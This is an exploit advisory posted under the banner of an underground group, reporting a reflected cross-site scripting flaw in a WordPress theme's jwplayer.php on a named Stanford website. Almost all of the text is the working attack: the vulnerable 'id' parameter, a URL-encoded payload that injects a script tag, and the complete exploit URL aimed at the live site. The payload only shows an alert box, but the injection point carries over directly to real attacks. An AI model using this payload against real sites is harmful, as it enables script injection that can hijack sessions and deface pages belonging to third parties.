/*********************************************************************************** ** Exploit Title: Stanford Wordpress Template Cross Site Scripting Vulnerability ** ** Exploit Author: Sha4yan ** ** Vendor Homepage : http://stvp.stanford.edu/ ** ** Google Dork: none ** ** Date: 2016-01-01 ** ** Tested on: Ubuntu / Mozila Firefox ** ************************************************************************************ ** Exploit Code: ******************
************************************************************************************ Location & Vulnerable query: ****************** http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id= Add This : %22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E ************************************************************************************* ** Proof: ****************** Executable script tag in Stanford's own page: Exploit : "> Exploit query: http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E ****************************************************************************************** ** Persian Underground GateWay ******************************************************************************************